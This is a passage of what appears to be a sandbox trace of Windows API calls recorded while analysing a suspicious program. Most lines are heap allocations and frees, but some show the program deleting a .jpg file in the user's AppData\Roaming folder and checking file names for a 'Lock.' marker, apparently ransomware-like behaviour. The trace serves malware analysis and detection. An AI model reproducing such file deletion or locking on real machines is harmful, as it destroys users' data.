dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0196.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0196.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0196.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0196.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0196.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0196.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0196.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0196.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0196.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0196.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0196.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0196.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0196.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0196.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0196.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0196.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0196.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0196.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0196.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0196.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0196.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0196.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0196.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0196.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0196.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0196.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0196.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0196.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0196.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0196.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0196.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0196.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0196.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0196.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0196.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0196.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0196.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0196.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0196.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0196.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0196.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0196.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0196.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0196.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0196.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0196.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0196.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0196.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0196.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0196.013] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0196.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0196.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0196.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0196.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0196.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0196.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0196.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0196.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0196.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0196.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0196.013] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0196.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0196.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0196.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ff0 [0196.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0196.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0196.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0196.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0196.014] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0196.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0196.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0196.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0196.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0196.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0196.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0196.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0196.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0196.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0196.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0196.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0196.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0196.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0196.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0196.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0196.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0196.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0196.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0196.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0196.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0196.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0196.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0196.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0196.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0196.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0196.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0196.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x78) returned 0x24f5278 [0196.016] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/co6M9Umeg.jpg", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\co6M9Umeg.jpg", lpFilePart=0x8bedfc*="co6M9Umeg.jpg") returned 0x3b [0196.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0196.016] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\co6M9Umeg.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\co6m9umeg.jpg")) returned 0x2020 [0196.016] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\co6M9Umeg.jpg", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfecc2f10, ftCreationTime.dwHighDateTime=0x1d4d4f4, ftLastAccessTime.dwLowDateTime=0x121975c0, ftLastAccessTime.dwHighDateTime=0x1d4c91d, ftLastWriteTime.dwLowDateTime=0x121975c0, ftLastWriteTime.dwHighDateTime=0x1d4c91d, nFileSizeHigh=0x0, nFileSizeLow=0x8aa4, dwReserved0=0x936, dwReserved1=0x4, cFileName="co6M9Umeg.jpg", cAlternateFileName="CO6M9U~1.JPG")) returned 0xaa5660 [0196.016] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\co6M9Umeg.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\co6m9umeg.jpg")) returned 1 [0196.018] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfecc2f10, ftCreationTime.dwHighDateTime=0x1d4d4f4, ftLastAccessTime.dwLowDateTime=0x121975c0, ftLastAccessTime.dwHighDateTime=0x1d4c91d, ftLastWriteTime.dwLowDateTime=0x121975c0, ftLastWriteTime.dwHighDateTime=0x1d4c91d, nFileSizeHigh=0x0, nFileSizeLow=0x8aa4, dwReserved0=0x936, dwReserved1=0x4, cFileName="co6M9Umeg.jpg", cAlternateFileName="CO6M9U~1.JPG")) returned 0 [0196.018] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0196.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0196.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0196.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0196.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0196.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0196.018] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0196.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0196.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0196.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0196.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0196.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0196.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0196.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0196.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0196.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0196.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0196.019] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0196.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0196.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0196.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0196.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0196.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0196.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa218 [0196.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0196.019] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0196.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0196.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0196.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0196.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0196.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0196.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0196.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0196.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0196.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0196.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0196.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0196.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0196.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0196.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0196.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0196.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0196.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0196.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0196.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0196.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0196.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0196.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0196.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0196.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0196.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0196.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0196.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0196.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0196.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0196.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0196.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0196.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0196.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0196.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0196.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0196.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0196.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0196.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x78) returned 0x24f5278 [0196.021] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/co6M9Umeg.jpg", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\co6M9Umeg.jpg", lpFilePart=0x8bf658*="co6M9Umeg.jpg") returned 0x3b [0196.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0196.021] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\co6M9Umeg.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\co6m9umeg.jpg")) returned 0xffffffff [0196.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0196.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0196.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0196.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0196.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0196.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0196.022] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0196.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0196.022] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0196.022] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0196.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0196.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0196.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0196.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0196.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0196.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0196.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0196.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0196.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0196.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0196.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0196.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0196.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0196.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CoTbYkKe.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0196.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oTbYkKe.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0196.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TbYkKe.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0196.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bYkKe.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0196.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YkKe.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0196.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kKe.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0196.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ke.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0196.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0196.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0196.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0196.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0196.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0196.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0196.023] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0196.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0196.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 